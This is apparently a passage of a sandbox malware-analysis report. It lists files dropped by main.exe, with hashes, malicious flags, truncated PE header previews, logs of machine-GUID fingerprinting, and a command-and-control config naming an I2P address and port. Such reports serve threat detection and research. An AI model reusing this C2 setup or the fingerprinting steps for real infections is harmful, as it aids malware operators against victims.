          • 195.133.48.136

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllfile.exeGet hashmaliciousUnknownBrowse
            file.exeGet hashmaliciousUnknownBrowse
              file.exeGet hashmaliciousUnknownBrowse
                file.exeGet hashmaliciousUnknownBrowse

                  Created / dropped Files

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.193969228624904
                  Encrypted:false
                  SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                  MD5:EC9499EE84ED09B77BE0A35EC87B781C
                  SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                  SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                  SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1305152
                  Entropy (8bit):5.101030479133318
                  Encrypted:false
                  SSDEEP:1536:jP+wUVCb41Bnf7WxLN96OPIFrsw2+NWIKFSC1WJnzlPL6M98h82l27hcSdxFLT9u:r
                  MD5:1EB6A98D279CEA53C0F394FF4349A45B
                  SHA1:FF1B24BAFFC54FA42DA629AB01E2868A7D54D47A
                  SHA-256:BA44474A8FF3969CF48D0213B9A350F8811D574B435AC3CB993D10220CBBC98D
                  SHA-512:37686262A65F0D50C5CBA3FC5AA6A18570524C2B6828B30CA1412B67CB84796333229312B1326C14DD8EC0B5D92A58BCB007E0AF540ED2B8BA9F980A7B82870E
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:Generic INItialization configuration [cnccli]
                  Category:dropped
                  Size (bytes):213
                  Entropy (8bit):5.129024990254676
                  Encrypted:false
                  SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                  MD5:7D88563AD41BAF4026CFC5D098CBF40D
                  SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                  SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                  SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                  Malicious:false
                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):6.236071662185895
                  Encrypted:false
                  SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                  MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                  SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                  SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                  SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1021
                  Entropy (8bit):5.4523778210953315
                  Encrypted:false
                  SSDEEP:24:CFAGHS+5lGyclY7GfyABI7cRE9FLxJ1lJUO0ERAXYje:CFdHS+54yclD8cm9FLLmOOJ
                  MD5:F9DF2D5358E65E2D2A86121A3D6565C1
                  SHA1:92353EB004D46B15AB327685FF55D1A23E0D38F4
                  SHA-256:6C3A8FCD6694EDC1B81AFF1B3C3AB74616338F8F0A8B5F9624981161F3EB1658
                  SHA-512:52DBA09AA2DD3B6363E849F0844812FE5FCB852E2B7674620093C6A5418CB567CCD98AB7C840518A4E0CE75D0A7007B17F632B3A6C031F0E59324EB0B027EDE9
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8bfb51dbd)..[I] (tcp_connect) -> Done(sock=0x354,host=7

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):92672
                  Entropy (8bit):6.229119632298774
                  Encrypted:false
                  SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                  MD5:7FEA520E80E7A73252F2A5C204BBF820
                  SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                  SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                  SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):52754369
                  Entropy (8bit):5.192905501908576
                  Encrypted:false
                  SSDEEP:1536:uTAj5Bv+RI7vNPvsJE0t+C8TKl810bF6rZH24p4JVBRBAeu+CbkR9cym60+hjEdZ:R
                  MD5:822067470CB5009467FAC1D4B0A9F003
                  SHA1:C38C5D47E3941C83BDFBF8C339CD5FABA77751EF
                  SHA-256:92AD03F6B92072303CDC6597EA86E8182804AEF640C9903FAD3DD5C0D49761B8
                  SHA-512:4670A07A2EE0BDF783F06286DBB5A4EBA04884EE1451E884C46051F42BA8A143A7F1FE1AEAEA5D60DC10ED4664079CFA61C77FF9B983D73231F6032322826ED3
                  Malicious:false
                  Preview:[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1744691639055,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642455787,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[W] (tcp_accept) -> select timedout(sock=0x374)..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642460049,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642463049,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642464300,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642468550,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d4243

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log.1

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):52754369
                  Entropy (8bit):5.1923591894594745
                  Encrypted:false
                  SSDEEP:1536:dHmQRVN9A548YywtydcNcCtQJLPTqrM3K95rIMdmmSOjHIClHQMF4kqKby/ZZDBU:x
                  MD5:8DFC0129B89701EBCCABB131D29293DE
                  SHA1:3828A0979E143F322F1088C91BD91328B8FC0AB5
                  SHA-256:EA6C853B2A4B031976C4C9F84D871EBAB4AC3C867C6065480950AC935A806EB1
                  SHA-512:8EDE024C004B282FAEAC85F6D217FAB9ED317860A3E868E64B5CA9FF66738A66D174B51E1504B66063A6D0DA5E94B16F887CA6E0594831A25AF87B8232D741BD
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):8568
                  Entropy (8bit):4.958673415285098
                  Encrypted:false
                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                  MD5:27535CEE6740DFC50A78A0322415E67C
                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                  Malicious:false
                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75977
                  Entropy (8bit):7.8696816318811385
                  Encrypted:false
                  SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                  MD5:E53A179BB45CD7EDD8371740D65076BD
                  SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                  SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                  SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                  Malicious:false
                  Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\2xpt3io56xrs5j5mjyimmwpivijuqqw2dwu3avspt3kft5rpbgda.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.5845968154884025
                  Encrypted:false
                  SSDEEP:12:djIM+yVTaLvW9bIcl1bzeUoOy7KUL3TO57C/5U9fZsnkPbm:dj5svWecjLob7Ksawi9fZfjm
                  MD5:148CFAD5035D8E71B682F20E0F30ED6C
                  SHA1:8B764CB50B831CA1C592956E09A0F2FEE39E5BAD
                  SHA-256:4522BF2FEF0B5E1C7164E6561EF589A13D77A6AEE4A2204F52224DB7B9ED0D3E
                  SHA-512:9C3A356664DACF8664EE2E3BFC07984805B53FB3D4A4D3906CEE45AF4F478C201C2CDD5470227D8918841D062A7CFDF41DC9CD0D0776FBC3F25B79B04B189498
                  Malicious:false
                  Preview:......(.J54...$"pK...F_.....K.1.....L.F...f..Hn..?9f......x.$..Sq..Z...Y.C/...bG...3S.<S..f...!>......fDlx7.T.q3..9Q.<..#s.....r8...Z.8..C....".S..BP...!n...l.5...!.g...t.j.(....X......y..:bw...a,U.R.N.T..}h.... 1"O...9.....b..CWPJ......|0...^.y...?.~..h.L..+.Qp.~..B..F.9l...]U[..Q...u..P........r...9R..t<N.r>Smy6.}gc\.L..S..t....q.y....m..,..q.}=n/.r.....n.t].,V>}.f..dH..S..&..S.(.~....x<...D:..JJ.N....tX.8..$(M..@.....`p... .NAY....N.oN....l\..@g....s.........u3-.=.?.$.:&k[..qX.E

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\bgpvwxs6gcu5hamy4lnzog2vkec45n2psc66dpw6lvo4v36rnxgq.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.592586587197845
                  Encrypted:false
                  SSDEEP:12:JpNJDH5P76d2BoG1rCLLnnRL6zhk2crskOVD7igOHuk9QJtWv:J5DZPRXS1L6zhk2c+VdOAti
                  MD5:7CA79977C905CBEFB7B087EC4097D99D
                  SHA1:D389251AB1FF95A8864969346BC353038224F2C9
                  SHA-256:893E6415109C89CAD7122E70952263D8B2BBCBED11AA542CD1DEB9185B0AFE24
                  SHA-512:CD3ED65D94509FD728753ECC8FB9EB071E2BCD027CFF596D3703D39DA5E39B5943A213C49A2194BC347794C3C55E265B49CA16864187D67561AF7F74BBE224DD
                  Malicious:false
                  Preview:.....\....4.(G....$.....v:.....E.<.....Q..,7../..1...f......|.v.......O..-..(.:..^.....C.v...M<...}...6..P=5....n;..).(.L.wW.G.!.=1..i...s.AtXs;Rf.B.Q..~8..?t.?....;....r...f...........g.f..i...q.LEp.J....tp...."p.Ks.-/..Z.t<...l....8. d..k.`q..[B.3.C......n.......7.......?wE*.P.5.Z.Z...iN.)#.+@..I.)....V..Yy-....v..?Ooe..5L...n...U$.2{..7Z.k-..Qg7v...H^....v.^.D...B.R....hnl6,.^B.;............}~M>:..D..W!.84....2.8K...%..(.~.JQh..S.p-.f..$..z..y!&0..m....m.....x.C!.$.......i..#.k.P^

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\fen7677zrfeokzjqt36wrgxqd4w4kl3aa5jxvwhjuqnoyazqbkla.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.549605740883306
                  Encrypted:false
                  SSDEEP:12:01b+YSsIEfUcxYZ24dCuVj4tLPNGO81Op+v6:0JmsI0NxE26CijcLlGO8A+S
                  MD5:C4855DF2794448678616B55A2B04EDB9
                  SHA1:378000F5371EA72C92B00D5AAAF4B0E4E7F39A35
                  SHA-256:D2798E3F046B4B28AE56FEB9557EDE1F3E9C19A41DEC60D733855B03BF2BB390
                  SHA-512:DB2DC1D96AF36161A54619932BF2CDB5752795EA0A3F590FC048028D08B4DCEC8B0C8D5FB668782D2D3D17A1515FD424E1C25E06D1A993B2DC0B50EE27D6AD2B
                  Malicious:false
                  Preview:....U.--../^..5....,%....x..tz-mz...U".%.l..@R.....H$...n....l9..wP.mrp...E\...+.Ir...`(.&....,.C..(A,..}ow;aO..=.e.%..=oW.'.=..#....B1F'....)........I......u.8.1d....@(....~......o.uz.^[}M..2...<"..i...'.V..F'..............f&d.!.km@..=....a.A..p..$.N.....[R...M.c........R<.....d..jh.........rN......Vd...r...PB.^.~.#.ZEn.D...@w....9.kG+.....pk....-D.~..u0$.&.....%.yI..6....S.02.^..!..'Z...u ?..\.H.r.U.e-d.......b..........r...?Di.LP.z...7o...A.@M...u.j.G)..l....>E.....H....b.Bu...

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\fkh4q6fhn2nkwomqrkawdxphqila6oioggosbbzczyq6cz6tq3ea.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.491093717406676
                  Encrypted:false
                  SSDEEP:12:p35b12+akYXHUIG9/PhAoz9PLJbYUgPRrv80T915vLQ3C/NhaxvfK:Z5b1ytVG9/Phb9P1EUgPK0T97LfNhaxq
                  MD5:5289161D79D49A1013FFC2FE17DC57FD
                  SHA1:325B4B015BFEBF04B56BECE23243539E4F90AFF3
                  SHA-256:A83D32A05AA97037CB856659815E421F09F419EFACF3BEAD4C20D45BEA14FD74
                  SHA-512:5BA6DFA9B9A7ADC0DCD6ACB406E9E49E8E60458AA09E3B37CCD0E7C9D8C826A5C87C05A47B6FF7CDF5FD18270171E98918A57A7C71C2587C1A34A0D14AF56B60
                  Malicious:false
                  Preview:e!)^&.L.k,-..&...7..L..t..l_N....$...|t..1.NC9.=..`T.%.....5...OC.....0.C..|b...@.#/..xsL..hN......k/.hN.c....gN.1#V.1.......M..".sZ.BULg....Q.s.=..1.\.....U..~.wcG...1..d...yK:.Q~K...j....q.*f....~...Rh.".Y...j...E.O.".!.a....[...\.M.,.m.l.[]#.)...<.,...V....)SR.p.....kk.;0...G..#.=.?..B..kk..7t.k5[...?]> uM.............{sK.6Y.h|I...c:.^y(...w...KNSV..r...w..L..y;....,.5#Q..>.~..KP./;..y...@:.|.Q.j@.(...C.#..h.l..fi.u. ..[.3...$.w..G............... 4.......x\.Q.;[C....bX....x|.8.&

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\jwf2ycsm7emxvevkqd2h4wdkhn52vfj4xj7wst277calaicbvl2q.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.624675697787775
                  Encrypted:false
                  SSDEEP:12:X5CQqiL0oF/FCGFzgzZXH24KPuzAFVXKaL4JqpW6aN:XBN7GpHOP5XKaL4kZaN
                  MD5:A74133A194F4F1F3F698AD6CD61F9F42
                  SHA1:EEB64C062FE54183CA758903B114C26462986247
                  SHA-256:121CB51E36AA2CE0D0BC61EC996476E2D2DEBB86A3FCEF25B63AC1EA35E5662A
                  SHA-512:7FFD4EEFD49B671C3A459CE6CE84E08A7AECB35AA86737A6757D33F97818C46726D0D36EBF5F7F49F69568FFFBF4F05B256A909E927301F8D82E4156ED6990F0
                  Malicious:false
                  Preview:....Y..p.@.....M }.6m...D^......:.I..J.@.bo;K....FA.>..XA[1...._.7-6B..._...-.a.@3.o.>..vv....'aT...R..... .}...Z._X.....X.#r.....6..W..EM.Jt5...DZ....B.I....c......5.....h(bg].....*..98]......;....`..).y6.d..-|..[.@."/G........|s..+...XY.....VG..s"a..8..Q.|..~.}TR.k%..."....j..{J#.5.W....g~...jUq..y.t!...3..h..=&..y2..1..zk.....m.A..K.....`..4|0....-........i../.."F.%x"..fyf.".E.......8~g.1..K....e0......%.....}?.....RS:..{......7...D7w..g.G.0..r.@.h.....\...;D.'.O.'."....l.Fh.._.@.@..

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\lgtsld5v6mjkk42vmve54o7pdgr5ad3ocu3opqvum5lz3vzqucnq.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.532526584485549
                  Encrypted:false
                  SSDEEP:12:MZGeE5nI6qMcPgmK8e2gLOchnSqePy+65NPE:VbB4+8e2chzeNohE
                  MD5:6A0E0F5A36D53532780BF05AE75EC8CA
                  SHA1:B781DB722002F1A76A2A5957D55BFA02229C4721
                  SHA-256:C4D9F203C54282D43999C5F047245CED8D60C550012C6227D0C1AD6A385ECB62
                  SHA-512:EB70145C9DEFD19E7507C407617C776369477FCA686CA396A0BD0E005E8052BC53951846AD12F343490134A5C42A516402CE7791E90ED46886313AA7261E4D03
                  Malicious:false
                  Preview:*.......%..9.o.mU.}(...`w.l.......e...<.,....c:.w.Ge....d.nb.]..H...0.sd..Ty*.}.~..d..r.K.....O....C!.e.fA..5}1Q(..3..R..e.......3...j..b,u...4L-..w;.3..{o...c.........L.Oo....Y2..i.P.t.3a.+..f-nO..........b..+..qE:..|a....F...)g8..z..z....48....*B...#bi.%S...6.@`f..J&zM.j<;<Y..;.O>..):.w%......T.q.L....&K....,>.<9.Z%......5R..E..!......n..B..........P.*I#f...u...:D3...G..44..\..~)..e.$.lo..M.^...6.5.. n)I#r...D.'..58x.l.N.=.Z.S.C.6.....]._.P...oPIglnR...b...m...=.p#3..!

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\m7m7mhkif7kqipihx52vnfrwvzbnjvr3fnqwrltilgatnla7cwnq.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.587836189726106
                  Encrypted:false
                  SSDEEP:12:5IL2acbOQDeXiU7qtydr12MGrcSHAhjb4V69EGc2LrhAOBr:5ILzQDBf+r8HrBAx4Vyv/5AO9
                  MD5:F467BFD8B8EC048117702F949AEE54CB
                  SHA1:2993376EE3893B87A2F0A8722ADCCFE7CF99C6AD
                  SHA-256:D20E2C900443946290748184DA89C6F05B57CE9FE160F006552116BA6C4BF926
                  SHA-512:22BF29B7DDA016A89895C6C603A2ADCAD9D55FA26C9F367E6FA9491E38253159D50A8FC2E89FDE5AF9BCD5ABC25900BF0F73D89410A7C6CDCC550A9E40AD1CD6
                  Malicious:false
